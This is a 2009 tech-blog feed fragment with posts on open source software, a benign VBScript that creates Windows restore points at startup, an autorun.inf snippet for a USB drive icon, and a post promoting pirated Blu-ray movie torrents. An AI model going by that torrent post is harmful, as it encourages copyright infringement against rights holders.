mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;}  /* List Definitions */  @list l0 	{mso-list-id:1293287466; 	mso-list-template-ids:-190825460;} @list l0:level1 	{mso-level-number-format:bullet; 	mso-level-text:; 	mso-level-tab-stop:.5in; 	mso-level-number-position:left; 	text-indent:-.25in; 	mso-ansi-font-size:10.0pt; 	font-family:Symbol;} ol 	{margin-bottom:0in;} ul 	{margin-bottom:0in;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="font-size:130%;"&gt;Most software that you buy or download only comes in the &lt;strong&gt;compiled&lt;/strong&gt; ready-to-run version. Compiled means that the actual program code that the developer created, known as the &lt;strong&gt;source code&lt;/strong&gt;, has run through a special program called a compiler that translates the source code into a form that the computer can understand. It is extremely difficult to modify the compiled version of most applications and nearly impossible to see exactly how the developer created different parts of the program. Most commercial software manufacturers see this as an advantage that keeps other companies from copying their code and using it in a competing product. It also gives them control over the quality and features found in a particular product.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size:130%;"&gt;&lt;strong&gt;Open source&lt;/strong&gt;&lt;/span&gt;&lt;span style="font-size:130%;"&gt; software is at the opposite end of the spectrum. The source code is included with the compiled version and modification or customization is actually encouraged. The software developers who support the open source concept believe that by allowing anyone who's interested to modify the source code, the application will be more useful and error-free over the long term.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size:130%;"&gt;To be considered as open source software by the software development industry, certain criteria must be met:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style="font-size:130%;"&gt;The      program must be freely distributed (It can be part of a package that is      sold though, such as Red Hat has done with Linux in the example below). &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style="font-size:130%;"&gt;Source      code must be included.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style="font-size:130%;"&gt;Anyone      must be allowed to modify the source code.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style="font-size:130%;"&gt;Modified      versions can be redistributed.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style="font-size:130%;"&gt;The      license must not require the exclusion of other software or interfere with      the operation of other software.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;  &lt;p&gt;&lt;span style="font-size:130%;"&gt;Let's take a look at a real world example of open source software. In 1991, Linus Torvalds, a student at the &lt;st1:placetype st="on"&gt;University&lt;/st1:placetype&gt; of &lt;st1:placename st="on"&gt;Helsinki&lt;/st1:placename&gt; in &lt;st1:country-region st="on"&gt;&lt;st1:place st="on"&gt;Finland&lt;/st1:place&gt;&lt;/st1:country-region&gt;, developed a new operating system based on Minix, a derivative of Unix, which he dubbed &lt;strong&gt;Linux&lt;/strong&gt;. Torvalds released version 0.02 of Linux under the GNU General Public License, which provides a good legal definition of open source software. A lot of people around the world downloaded Linux and began working with it. Many of these users were programmers in their own right and made modifications to the source code that Torvalds had included. Over the next three years, Torvalds received these modified versions from the other programmers and incorporated many of the changes into the baseline version and released Linux version 1.0 in 1994. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size:130%;"&gt;A common concern for end-users who wish to use open source software is the lack of a warranty and technical support. Because the software's license encourages modification and customization, it is nearly impossible to support. This is why &lt;strong&gt;Red Hat Software&lt;/strong&gt;, founded in 1994, created the "Official Red Hat Linux" and is able to sell this normally "free" software. The main value that Red Hat adds to the package is a warranty and technical support. For most businesses, the assurance of technical support has been a key factor in the decision to buy Linux instead of simply downloading it for free. In addition to Red Hat, there are several other companies that have packaged Linux, usually with additional software, for resale. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size:14;"&gt;&lt;span style="font-size:130%;"&gt;Besides Linux, &lt;strong&gt;Mozilla&lt;/strong&gt; (Netscape browser core), &lt;strong&gt;Apache&lt;/strong&gt; (Web server), &lt;strong style="color: rgb(0, 0, 0);"&gt;&lt;u&gt;PERL&lt;/u&gt;&lt;/strong&gt; (Web scripting language) and &lt;strong&gt;PNG&lt;/strong&gt; (graphics file format) are all examples of very popular software that is based on open source.&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;Here are the download links of some popular open source software&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link style="font-weight: bold;" rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} a:link, span.MsoHyperlink 	{color:blue; 	text-decoration:underline; 	text-underline:single;} a:visited, span.MsoHyperlinkFollowed 	{color:purple; 	text-decoration:underline; 	text-underline:single;} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;p style="font-weight: bold;" class="MsoNormal"&gt;&lt;span style="font-size:130%;"&gt;Ubuntu (Linux Operating System)&lt;br /&gt;&lt;a href="http://www.ubuntu.com/" target="_blank"&gt;http://www.ubuntu.com&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Mozilla (Web Browsing Suite)&lt;br /&gt;&lt;a href="http://www.mozilla.com/" target="_blank"&gt;http://www.mozilla.com&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;OpenOffice.org (Full Office Suite-MSOffice Compatible)&lt;br /&gt;&lt;a href="http://www.openoffice.org/" target="_blank"&gt;http://www.openoffice.org&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The GNU Image Manipulation Program (Like Photoshop)&lt;br /&gt;&lt;a href="http://www.gimp.org/" target="_blank"&gt;http://www.gimp.org&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Rockbox (Jukebox Firmware - iPod and others)&lt;br /&gt;&lt;a href="http://www.rockbox.org/" target="_blank"&gt;http://www.rockbox.org/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Inkscape (Vector Graphics Editor)&lt;br /&gt;&lt;a href="http://www.inkscape.org/" target="_blank"&gt;http://www.inkscape.org&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Pidgin (Instant Messaging)&lt;br /&gt;&lt;a href="http://www.pidgin.im/" target="_blank"&gt;http://www.pidgin.im/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;There are also other linux distributions like:&lt;br /&gt;&lt;br /&gt;PCLinuxOS: &lt;a href="http://www.pclinuxos.com/" target="_blank"&gt;http://www.pclinuxos.com&lt;/a&gt;&lt;br /&gt;openSUSE: &lt;a href="http://www.opensuse.org/" target="_blank"&gt;http://www.opensuse.org&lt;/a&gt;&lt;br /&gt;Debian: &lt;a href="http://www.debian.org/" target="_blank"&gt;http://www.debian.org&lt;/a&gt;&lt;br /&gt;Fedora Core: &lt;a href="http://www.fedoraproject.org/" target="_blank"&gt;http://www.fedoraproject.org&lt;/a&gt;&lt;br /&gt;Damn Small Linux (DSL): &lt;a href="http://www.damnsmalllinux.org/" target="_blank"&gt;http://www.damnsmalllinux.org&lt;/a&gt;&lt;br /&gt;Gentoo: &lt;a href="http://www.gentoo.org/" target="_blank"&gt;http://www.gentoo.org&lt;/a&gt;&lt;br /&gt;And many more: &lt;a href="http://distrowatch.com/" target="_blank"&gt;http://distrowatch.com&lt;/a&gt;&lt;span style="font-size: 14pt; font-family: Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;                &lt;/p&gt; &lt;br /&gt; &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-7259030016140748421?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/7259030016140748421/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/05/open-source-softwares.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/7259030016140748421'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/7259030016140748421'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/05/open-source-softwares.html' title='OPEN SOURCE SOFTWARES'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_T53992hHLOM/SgF0K0gJonI/AAAAAAAAAJ4/6KkU2HoJESA/s72-c/opensource_logo.gif' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-8957037833341526447</id><published>2009-05-05T02:14:00.000-07:00</published><updated>2009-05-05T02:17:04.362-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='windows'/><title type='text'>AUTOMATED RESTORE</title><content type='html'>&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} h3 	{mso-margin-top-alt:auto; 	margin-right:0in; 	mso-margin-bottom-alt:auto; 	margin-left:0in; 	mso-pagination:widow-orphan; 	mso-outline-level:3; 	font-size:13.5pt; 	font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;h3&gt;&lt;span style="font-size: 14pt; font-family: Arial; font-weight: normal;"&gt;I found this cool VB script while surfing the other day .just copy paste the part after quotes in a notepad file (don’t copy the quotes)save the file as .vbs n run it to ensure automatic system restore&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/h3&gt;  &lt;p class="MsoNormal"&gt;&lt;i&gt;&lt;span style="font-size: 14pt; font-family: Arial; color: rgb(0, 132, 0);"&gt;&lt;br /&gt; &lt;!--[if !supportLineBreakNewLine]--&gt;&lt;br /&gt; &lt;!--[endif]--&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/i&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;i&gt;&lt;span style="font-size: 14pt; font-family: Arial; color: rgb(0, 132, 0);"&gt;' Copy from here ---------------------&gt;&lt;br /&gt;' Create a System Restore Point&lt;br /&gt;' supported on: Windows XP&lt;br /&gt;&lt;/span&gt;&lt;/i&gt;&lt;b&gt;&lt;span style="font-size: 14pt; font-family: Arial;"&gt;&lt;br /&gt;Const DEVICE_DRIVER_INSTALL = 10&lt;br /&gt;Const BEGIN_SYSTEM_CHANGE = 100&lt;br /&gt;&lt;br /&gt;strComputer = "."&lt;br /&gt;Set objWMI = GetObject("winmgmts:" _&lt;br /&gt;&amp;amp; "\\" &amp;amp; strComputer &amp;amp; "\root\default")&lt;br /&gt;&lt;br /&gt;Set objItem = objWMI.Get("SystemRestore")&lt;br /&gt;errResults = objItem.CreateRestorePoint _&lt;br /&gt;("AUTOMATED RESTORE by ARKA", DEVICE_DRIVER_INSTALL, BEGIN_SYSTEM_CHANGE)&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;i&gt;&lt;span style="font-size: 14pt; font-family: Arial; color: rgb(0, 132, 0);"&gt;&lt;br /&gt;'&lt;------------------------ To here&lt;/span&gt;&lt;/i&gt;&lt;span style="font-size: 14pt; font-family: Arial;"&gt;&lt;br /&gt;copy and save as *.vbs....use global startup...stay safe !&lt;br /&gt;&lt;br /&gt; &lt;!--[if !supportLineBreakNewLine]--&gt;&lt;br /&gt; &lt;!--[endif]--&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="font-size: 14pt; font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="font-size: 14pt; font-family: Arial;"&gt;It creates a Restore Point whenever executed..Written in VBScript using WMI.&lt;br /&gt;You can copy it to the startup folder...so that..every time the computer boots..it creates a restore point...So that you can restore your computer back...&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-8957037833341526447?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/8957037833341526447/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/05/automated-restore.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/8957037833341526447'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/8957037833341526447'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/05/automated-restore.html' title='AUTOMATED RESTORE'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-302377002819108045</id><published>2009-05-04T12:00:00.000-07:00</published><updated>2009-05-04T12:37:00.313-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='DOWNLOADS'/><title type='text'>ONE OF THE BEST TORRRENT RIPPERS</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_T53992hHLOM/Sf9CUg7igYI/AAAAAAAAAJw/a8Fvraac4wk/s1600-h/utorrent-logo.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 256px; height: 256px;" src="http://2.bp.blogspot.com/_T53992hHLOM/Sf9CUg7igYI/AAAAAAAAAJw/a8Fvraac4wk/s400/utorrent-logo.png" alt="" id="BLOGGER_PHOTO_ID_5332053404034433410" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} a:link, span.MsoHyperlink 	{color:blue; 	text-decoration:underline; 	text-underline:single;} a:visited, span.MsoHyperlinkFollowed 	{color:purple; 	text-decoration:underline; 	text-underline:single;} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="font-size: 14pt; font-family: Arial;"&gt;Downloading movies seems to be a rage these days .Everytone is downloading loads of movies.One of my friends has a movie collection of well over 1.5 TB(1500GB).Now that’s sumthing that will take a lot of time for me to achieve .&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="font-size: 14pt; font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="font-size: 14pt; font-family: Arial;"&gt;Till now Dvd rips were in vogue but now they are slowly being replaced by Blu ray disc rips .Why? just see one movie and check it out yourself &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="font-size: 14pt; font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="font-size: 14pt; font-family: Arial;"&gt;I wanted to watch CASINO ROYALE &lt;span style=""&gt; &lt;/span&gt;again, so searched for a good rip on torrentz.com, I came across a h264 rip by a ripper called Secret Myth. and I was literally blown outta my mind.&lt;br /&gt;&lt;br /&gt;Check out the specs:&lt;br /&gt;&lt;br /&gt;Video : H.264/MPEG-4 AVC / 745 kbs / 23.976 fps / 1280 x 544&lt;br /&gt;_______________________________________________________________&lt;br /&gt;&lt;br /&gt;Audio : MPEG-4 AAC-LC / 48000Hz 142 kbs / 5,1 Ch&lt;br /&gt;_______________________________________________________________&lt;br /&gt;&lt;br /&gt;Size : 703,6 MB&lt;br /&gt;&lt;br /&gt;Do you see the 1280 x 544 resolution? did you notice the MP4 AAC 5.1 Surround sound, and bloody did you people notice the effing size of this thing? 703.6 MB!!!!&lt;br /&gt;&lt;br /&gt;You just need to try this genius out.&lt;br /&gt;&lt;br /&gt;He does a lot of BDrips, which is the only thing I download &lt;span style=""&gt; &lt;/span&gt;these days, for n00bs, BDRip is a rip made from a blueray disk instead f a DVD.&lt;br /&gt;&lt;br /&gt;Here's a link to his torrents:&lt;br /&gt;&lt;br /&gt;&lt;a href="javascript:void(0);" target="_blank"&gt;http://www.mininova.org/user/secret_myth&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;No need to thank me, thank Secret Myth by seeding his stuff if you like it. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="font-size: 14pt; font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="font-size: 14pt; font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt; &lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-302377002819108045?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/302377002819108045/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/05/one-of-best-torrrent-rippers.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/302377002819108045'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/302377002819108045'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/05/one-of-best-torrrent-rippers.html' title='ONE OF THE BEST TORRRENT RIPPERS'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_T53992hHLOM/Sf9CUg7igYI/AAAAAAAAAJw/a8Fvraac4wk/s72-c/utorrent-logo.png' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-2213504296512168286</id><published>2009-05-02T02:37:00.000-07:00</published><updated>2009-05-03T04:49:12.836-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='windows'/><title type='text'>CHANGE REMOVABLE DISK DEFAULT LOOK</title><content type='html'>The removable disk has a default look.This default look of the removable drives can be changed by a simple trick.Follow the steps to change the icon ..&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Select your favourite picture which u want to set for the icon of removable disk.&lt;br /&gt;&lt;br /&gt;+ Save the selected image as anyname.ico (How to do is open the picture in mspaint. and save as anyname.ico).Make sure that selected image is small.&lt;br /&gt;&lt;br /&gt;+ Open note pad and copy the following code.&lt;br /&gt;&lt;br /&gt;[autorun]&lt;br /&gt;Label=ANYNAME&lt;br /&gt;Icon=filename.ico&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;+ Here label indicates the name of ur removable disk and icon indiactes the name of your icon.&lt;br /&gt;&lt;br /&gt;+ Now save is notepad file as autorun.inf.&lt;br /&gt;&lt;br /&gt;+ Copy both files (autorun.inf and Icon file) to your removable drive. You can make both files as hidden.&lt;br /&gt;&lt;br /&gt;Now unplug the drive and connect it back to USB and now you can see the icon of your removable disk.Thats it!!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-2213504296512168286?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/2213504296512168286/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/05/change-removable-disk-default-look.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' 